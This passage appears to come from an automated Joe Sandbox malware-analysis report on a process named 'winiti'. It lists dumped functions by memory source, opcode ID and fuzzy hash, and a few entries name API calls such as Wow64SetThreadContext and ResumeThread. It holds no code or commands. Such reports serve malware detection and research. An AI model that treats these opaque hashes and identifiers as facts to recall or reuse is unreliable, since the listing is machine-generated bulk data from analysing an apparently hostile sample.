                                                              • Instruction Fuzzy Hash: 1D41BAB4D002589FCF10CFA9D984AEEBBF1AB49314F24802AE419B7244D739A949CF54
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0019E8CF
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_190000_winiti.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: ea1d686e596191351cc6d7f37cfc5824cbf072443be1ff5adaad8882e0c82357
                                                              • Instruction ID: 52a3dbf56e82a2e9110070c90da2bfe90aacea11dbe069b6c97c4b5b4a9d4b42
                                                              • Opcode Fuzzy Hash: ea1d686e596191351cc6d7f37cfc5824cbf072443be1ff5adaad8882e0c82357
                                                              • Instruction Fuzzy Hash: 2241AAB4D002589FCF10CFA9D984AEEFBF1AF49314F24842AE419B7244D739A989CF54
                                                              APIs
                                                              • ResumeThread.KERNELBASE(?), ref: 0019E7AE
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_190000_winiti.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: e95d7c34337d1993ccb858dedbab2b4af34da541b930882332faeaa2cdf33b74
                                                              • Instruction ID: 495ea42eb024a29f01592e1c4325746602f1741ac99d91c577e6cab7b05e9e5d
                                                              • Opcode Fuzzy Hash: e95d7c34337d1993ccb858dedbab2b4af34da541b930882332faeaa2cdf33b74
                                                              • Instruction Fuzzy Hash: 8331BAB4D002189FCF14CFAAD984AAEFBB5EF49314F24942AE815B7300C735A905CF95
                                                              APIs
                                                              • ResumeThread.KERNELBASE(?), ref: 0019E7AE
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_190000_winiti.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 73b4302f46ff01b6dd0755266cbd2df02211bf2404abc0426d6c76d4399e7359
                                                              • Instruction ID: d078110c6af550df877bdbee0d239ba89dafb21c104e44ff03e679190864a3d4
                                                              • Opcode Fuzzy Hash: 73b4302f46ff01b6dd0755266cbd2df02211bf2404abc0426d6c76d4399e7359
                                                              • Instruction Fuzzy Hash: B431C9B8D002189FCF14CFA9D984AAEFBB1BF49314F24846AE815B7340C734A905CF95
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (
                                                              • API String ID: 0-3887548279
                                                              • Opcode ID: 4ef9def90a57e9cd166aa0193217dcb5b3b794db15f0b26605fff2887f41ebe1
                                                              • Instruction ID: 0e34c00bbe3995b197d68ffec9e821075c221bfb18c41731744ceab4632b8f7b
                                                              • Opcode Fuzzy Hash: 4ef9def90a57e9cd166aa0193217dcb5b3b794db15f0b26605fff2887f41ebe1
                                                              • Instruction Fuzzy Hash: 5CF09235949218CFEB65CF64C884BEEBBB5FB08314F2495D9D409A3292C735AE85DF00
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374866922.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_13d000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f96b653f214e75f19fd19daed920a72af6fe0ab76211e5c6c0e021f36c48d5d0
                                                              • Instruction ID: 03c992a4348eac45ac72be90a8f484c26676ca76a0b44247905b8b03d1444a50
                                                              • Opcode Fuzzy Hash: f96b653f214e75f19fd19daed920a72af6fe0ab76211e5c6c0e021f36c48d5d0
                                                              • Instruction Fuzzy Hash: 5721C2B5604240EFDB16CF14F9C0B26BBA5FB84314F24C5A9E8494B256C736D84ACB61
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374866922.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_13d000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5bac1f1d1689a2ef3b0582937e6aeb3e2dc750e4a8c24c5729f060c24c9b42c2
                                                              • Instruction ID: 4d967bc66fc9d1a25c83f1b7f0c5bf5a08a76d64203610675017b6464fe62645
                                                              • Opcode Fuzzy Hash: 5bac1f1d1689a2ef3b0582937e6aeb3e2dc750e4a8c24c5729f060c24c9b42c2
                                                              • Instruction Fuzzy Hash: 8721B0B5604240EFDB19CF24F8C4B26BB65EB84B14F34C5A9E8494B256C736D84BCBA1
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cb612a4e9ff76d4f0b1a4928f1fe2f18f3dc82bc285ed1e3c904285b690e4461
                                                              • Instruction ID: 02159a892244f8b6b5fb19ff58be3237e464b76ab5365d78a500a081d8152694
                                                              • Opcode Fuzzy Hash: cb612a4e9ff76d4f0b1a4928f1fe2f18f3dc82bc285ed1e3c904285b690e4461
                                                              • Instruction Fuzzy Hash: 02317834A48218DFDB21CF24CC94BE9BBB5BF0A300F1440EAD509A7291DB30AA86DF01
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374866922.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_13d000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a32f609addacb6cb4880d38ae249acf73ab1d62877314c61fc5c2e4b01bb647b
                                                              • Instruction ID: c93a144368a3656922636856f90339f43b112a12ea4bafa1108d28c1e8bd612a
                                                              • Opcode Fuzzy Hash: a32f609addacb6cb4880d38ae249acf73ab1d62877314c61fc5c2e4b01bb647b
                                                              • Instruction Fuzzy Hash: 502171755083809FCB06CF14E994711BF71EB46714F28C5DAD8498F266C33AD85ACB62
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d56b9996c4d5978168f4e48ac37df4141488cb3a26bfdad62f9c26f777a70d14
                                                              • Instruction ID: 60382f607a6e068a099d74d3018510192017cdaa1c9798f8e59e23d9bc2f01cd
                                                              • Opcode Fuzzy Hash: d56b9996c4d5978168f4e48ac37df4141488cb3a26bfdad62f9c26f777a70d14
                                                              • Instruction Fuzzy Hash: 84213879908358CFDB54DF64C884AE9BBB9BF1A300F14A4D6D40D9B292CB30AE85CF50
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2dcfb7b397cebffb4f61a7193d17a6a31cc28db029cece09ecbddbaa5ffcf570
                                                              • Instruction ID: 637751b7e83883d2fd2611727251a17cb8ba405bc17b811a33b9af44487f6fb8
                                                              • Opcode Fuzzy Hash: 2dcfb7b397cebffb4f61a7193d17a6a31cc28db029cece09ecbddbaa5ffcf570
                                                              • Instruction Fuzzy Hash: CC21B778909218CFDB64CF54D980BEDBBB8BB09301F24A5D9D50DA7292DB30AE85DF40
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e912ff273967d8a631cffc6a8f2954ac10be48709c240bde38b4277ce3db4175
                                                              • Instruction ID: 6c7ceea806292f3040a9a4c7ae70513c1eb87595cd7b4891d6bc3a1966e34bec
                                                              • Opcode Fuzzy Hash: e912ff273967d8a631cffc6a8f2954ac10be48709c240bde38b4277ce3db4175
                                                              • Instruction Fuzzy Hash: DE117C398092A4DFCB15CF64D8587E9BFB4FF4A305F14A4DAC449AA292C7706A86CF11
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374866922.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_13d000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                              • Instruction ID: 67c540baf6bac1ad4bbaa40799964805698ccef35c79b973d5445efff56ac4c6
                                                              • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                              • Instruction Fuzzy Hash: AE119D75904280DFDB12CF14E5C4B16FFA1FB84314F28C6ADD8494B656C33AD85ACBA2
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a89837e5f372e5c2a9dbb8d0a7216ea4ff222d1ba83f91cfcaed77d72180f24e
                                                              • Instruction ID: bfcd679594bbf0667ca83d46644fbe41952c8792d0c6a11721db639731255db9
                                                              • Opcode Fuzzy Hash: a89837e5f372e5c2a9dbb8d0a7216ea4ff222d1ba83f91cfcaed77d72180f24e
                                                              • Instruction Fuzzy Hash: 01112739908218CFCB54DF68C884AE9BBB9FF19300F1454E6D90DAB292C7306A85CF50
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e290e17014558a9fbab7e9af04a1ce76658e016dd98a368a37cec7677b5f08a1
                                                              • Instruction ID: 3aedbc36f4396225ee3bf3eb60e4a79c4b99860da5f33db47aeb16e370b55844
                                                              • Opcode Fuzzy Hash: e290e17014558a9fbab7e9af04a1ce76658e016dd98a368a37cec7677b5f08a1
                                                              • Instruction Fuzzy Hash: C211ED75804228CFCB64DF64C844BEDBBF1BB59310F2094EAD00AA2291CB356E96DF00
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4cea38a0159d72f50d77fd39c8f6ce3f33fbffd74049d9851e6d16a95380a0bf
                                                              • Instruction ID: 5ace73963ce9c47698727129a856c38be6bd562f60ad79414449f5d79711e769
                                                              • Opcode Fuzzy Hash: 4cea38a0159d72f50d77fd39c8f6ce3f33fbffd74049d9851e6d16a95380a0bf
                                                              • Instruction Fuzzy Hash: C3014C35908318CFDB54DF54C884BEDBBF9BB59300F146495D50DA7292C770AA85CF50
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 75809ee47edb386aca0e26d44a979d56ac90e30474efc6c04e0e6203b045d3ac
                                                              • Instruction ID: 066d8bd0e7a9ce24abadb10e794f20497af9b115d304b6b7d1a7df8a301ce4bb
                                                              • Opcode Fuzzy Hash: 75809ee47edb386aca0e26d44a979d56ac90e30474efc6c04e0e6203b045d3ac
                                                              • Instruction Fuzzy Hash: 0D018875908318DFCB04DF68C890AE9BBF9BF0A300F1454A6C90DEB292D770AA84CB00
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f8414e174ceed48e5884fcd693bfdf8c5dbcdf652cba1ed8ce0d251398b1a4f7
                                                              • Instruction ID: 70ea9f8f77333e6f5ae7ace0c1c91e4b7327bfe9b21098962536f8b63708d02c
                                                              • Opcode Fuzzy Hash: f8414e174ceed48e5884fcd693bfdf8c5dbcdf652cba1ed8ce0d251398b1a4f7
                                                              • Instruction Fuzzy Hash: 78015A39804264DFCB24CF64DC58BE8BBF4AF56312F0495EA8409A63E1D6346A8ACF10
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3466906cdfb57795d6249aaf5399d1cb9d2926cf0194c98e464ec9e2c9e9b014
                                                              • Instruction ID: 5c5550702d0af297b749d179e81a24d294b58e2d85a751f3b81d905fc444c478
                                                              • Opcode Fuzzy Hash: 3466906cdfb57795d6249aaf5399d1cb9d2926cf0194c98e464ec9e2c9e9b014
                                                              • Instruction Fuzzy Hash: 89011434A48218CFDB25CF60CC54BE9BBB5BB09310F1455AA9508AB2A1C7746E8ADF40
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aae17608c30958fc5d248648c91063a00d157c1250d71d290d019cd94a630408
                                                              • Instruction ID: 709cd30daf2839997d9c432c3cdaa43659297677746dcb4f36072afae2771a7f
                                                              • Opcode Fuzzy Hash: aae17608c30958fc5d248648c91063a00d157c1250d71d290d019cd94a630408
                                                              • Instruction Fuzzy Hash: 24F082748081548FDB44CF24C845EE8BBB4FB49314F1442DAC6199B286C7725B85DF50
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be34fe30be600ffa5a7390ebe8233e9c35f30aa967d2d71109182d14b628517c
                                                              • Instruction ID: d1be0540602881205bb8ed5af93ee7084693653357f87b877fca0b0efb0e2f89
                                                              • Opcode Fuzzy Hash: be34fe30be600ffa5a7390ebe8233e9c35f30aa967d2d71109182d14b628517c
                                                              • Instruction Fuzzy Hash: 4BE03934D04208EFC740DFA8E8486ADBBB4BB4A300F1091A9C809A3350D7306A45DF81
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f6f958b71a1b4ffe1dc52494a8c2d676dbc118d291e278798a3d117e4b8b2616
                                                              • Instruction ID: 437c256d981a217c39a93ad88dbf2535a6fedb63ff485b2ed407c059e960460a
                                                              • Opcode Fuzzy Hash: f6f958b71a1b4ffe1dc52494a8c2d676dbc118d291e278798a3d117e4b8b2616
                                                              • Instruction Fuzzy Hash: 75F03034408298CFC711CB50DC146E8BFB4AB4A308F1455D688085B2A2D7315A45CB00
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1dc73f8f88047ea6982823ab6997ab04cbafc41629311e5a9a26027e75073add
                                                              • Instruction ID: 599c7a751b712702857a27979bd65e252f194231b6d6936250c1e775457f156c
                                                              • Opcode Fuzzy Hash: 1dc73f8f88047ea6982823ab6997ab04cbafc41629311e5a9a26027e75073add
                                                              • Instruction Fuzzy Hash: EAF0C93590020CEFCB05DF98D950A9DBBB5FB48310F14C0A9ED5467350C732AA61EF85
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0d9836d26916fe502c6d7e7d0142eebfff4aa75578a4b032e11cb6f803d53b90
                                                              • Instruction ID: 8e25241d8fca8a5282a2e151a823f6b19306dfb0168e69c66d81b476c25c41e1
                                                              • Opcode Fuzzy Hash: 0d9836d26916fe502c6d7e7d0142eebfff4aa75578a4b032e11cb6f803d53b90
                                                              • Instruction Fuzzy Hash: 10E0EC74D48208DBDF18CF91DC51ADDBFB6FB59300F24A069A609BB295D6302946DF40
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.375072549.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5b0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d5208e75bdbcb5835c3ad5f46e6974937fb6366402c164bce263858bd63a192a
                                                              • Instruction ID: 05888f53b301c462beadb2520baacb2a3b0a470f8ede862b47383f0f1a32d55c
                                                              • Opcode Fuzzy Hash: d5208e75bdbcb5835c3ad5f46e6974937fb6366402c164bce263858bd63a192a
                                                              • Instruction Fuzzy Hash: AFC0123140521CDBD704DBA8D85576E776CE741715F101199890433250DE311E40C795
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_190000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8fcc0b0139892111e2f85475c4e13cdb168a9c9a8b5c6ee88b48db526f0022dc
                                                              • Instruction ID: c375714719276db04382c87f604d094cc40e89e7656f5dcae658fdb3e46ccf5e
                                                              • Opcode Fuzzy Hash: 8fcc0b0139892111e2f85475c4e13cdb168a9c9a8b5c6ee88b48db526f0022dc
                                                              • Instruction Fuzzy Hash: B0E1E674E002598FCB14DFA9D590AADFBF2BF89304F24816AD814AB35AD730AD41CF61
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_190000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 20d8e9b1a477e748a13493b491c5aba22b9db08b8154d14730353842e8c20cf5
                                                              • Instruction ID: 98267da93ad8740860d174d8b5375a62f04211d22420d5a95f846105ae7287e7
                                                              • Opcode Fuzzy Hash: 20d8e9b1a477e748a13493b491c5aba22b9db08b8154d14730353842e8c20cf5
                                                              • Instruction Fuzzy Hash: 28E1E774E002598FCB14DFA9D5909AEFBF2BF89304F24816AD814AB356D731AD41CFA1
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_190000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 61ebf4e7a49a4842b0720858571079fc7ade99dafcba0635d653d6b49b9a5620
                                                              • Instruction ID: a86f3176add1b2b11db8182df5f57a71b3aace8239f831bf95c19e73080bcc13
                                                              • Opcode Fuzzy Hash: 61ebf4e7a49a4842b0720858571079fc7ade99dafcba0635d653d6b49b9a5620
                                                              • Instruction Fuzzy Hash: 76E1E774E002598FCB14DFA9D590AADFBF2BF89304F24816AD815AB356D730AD41CFA1
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_190000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2388d98175d8f1d6167a67fc76f40a5ced506624160c20fd9d94fa72f666c34f
                                                              • Instruction ID: ea7a5926290b4cc5f4aab4b3da01af925a4d0305c04643528f4fc3b3663c8d02
                                                              • Opcode Fuzzy Hash: 2388d98175d8f1d6167a67fc76f40a5ced506624160c20fd9d94fa72f666c34f
                                                              • Instruction Fuzzy Hash: 6EE1F974E002598FCB14DFA9C5909AEFBF2BF89304F24816AD815AB356D731AD41CFA1
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_190000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a100c0f700d00486e70dda7d615b6ef1d8d7ea833e4a8628f7d9e2bd17de068
                                                              • Instruction ID: e398b955b539416e53fb9193219ad6a9fc20601b9a2e24c09fbe6ac2717495e2
                                                              • Opcode Fuzzy Hash: 2a100c0f700d00486e70dda7d615b6ef1d8d7ea833e4a8628f7d9e2bd17de068
                                                              • Instruction Fuzzy Hash: 54E1F874E002598FCB14DFA9C590AADFBF2BF89304F24816AD814AB356D770AD41CFA1
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.374905068.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_190000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3f0cd71799849a8f58c3ad16e9a914fc97234feded2fe29903e05553f5f723e7
                                                              • Instruction ID: eeeeee17a22d25bf956ce42aa6fcd7a7c966495589f59315df2f1f2620aa837a
                                                              • Opcode Fuzzy Hash: 3f0cd71799849a8f58c3ad16e9a914fc97234feded2fe29903e05553f5f723e7
                                                              • Instruction Fuzzy Hash: 2D512C74E042598FDB14DFA9D5905AEFBF2BF89304F2481AAD408AB356D7309E41CFA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $p$$p$$p$$p$$p$$p
                                                              • API String ID: 0-3402276426
                                                              • Opcode ID: ed50afde0b8a740554da2588d064621a5a9966ee2c97a9b6182df9cc83841526
                                                              • Instruction ID: 5d1f7464cc0ba4a785288d2a9ba2c8e70a4ed9c7f2200c04026fb87de7c89bf1
                                                              • Opcode Fuzzy Hash: ed50afde0b8a740554da2588d064621a5a9966ee2c97a9b6182df9cc83841526
                                                              • Instruction Fuzzy Hash: A6321F31E10756CBCB14EF64D8946ADF7B2BFC9300F60C66AD44AA7254EB70AE85CB40
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5693d033bbc29a5e6424e5a3806e5f7fd70b1a28dfcedccda5d76e7f318fb4cf
                                                              • Instruction ID: 3141d65fdf24451292eb950e0b4c9aa6e32c0bbf5e2c3b79b3acaabfafaaec56
                                                              • Opcode Fuzzy Hash: 5693d033bbc29a5e6424e5a3806e5f7fd70b1a28dfcedccda5d76e7f318fb4cf
                                                              • Instruction Fuzzy Hash: 80331F31D10B1A8ECB11EF68C8846ADF7B1FF99300F55C79AE458A7211EB70AAD5CB41
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: df00795db325770310e8fa85b6972c151c4c8f92796e43ea5299ebfe312267f2
                                                              • Instruction ID: f3c590f69c05731d2177a25a3f1366ac3c404e08a831e5941f7c7eaefd62b245
                                                              • Opcode Fuzzy Hash: df00795db325770310e8fa85b6972c151c4c8f92796e43ea5299ebfe312267f2
                                                              • Instruction Fuzzy Hash: 29327074B002199FDF15DB68E594BADB7B2FB88310F20842AE405EB359DB39ED45CB90
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4f08259748a76bfa7623fb7e943cfdf0f1488d9382d438229a59d60cf9dd9a60
                                                              • Instruction ID: bb64c9def6968112145667ebb1eff429b3fa2b7e0b5237cbf2b1a712fd1e00ad
                                                              • Opcode Fuzzy Hash: 4f08259748a76bfa7623fb7e943cfdf0f1488d9382d438229a59d60cf9dd9a60
                                                              • Instruction Fuzzy Hash: D6227070B006198FEF24DB98E4C4BADB7B2EB95310F648925E405EB395DB38DD81CB91
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 789ced45adc6ff3bf6434c7b2eba549af17f9911b3f3b2296ec705903b16df98
                                                              • Instruction ID: 48026fe0693dc938327e02104a546945b5fbf8e944549d5cedf08af0c37be06d
                                                              • Opcode Fuzzy Hash: 789ced45adc6ff3bf6434c7b2eba549af17f9911b3f3b2296ec705903b16df98
                                                              • Instruction Fuzzy Hash: A5B18C70E1020A8FDF10DFA8D88579DBBF6AF89354F24812AD815EB394EB749C55CB81
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
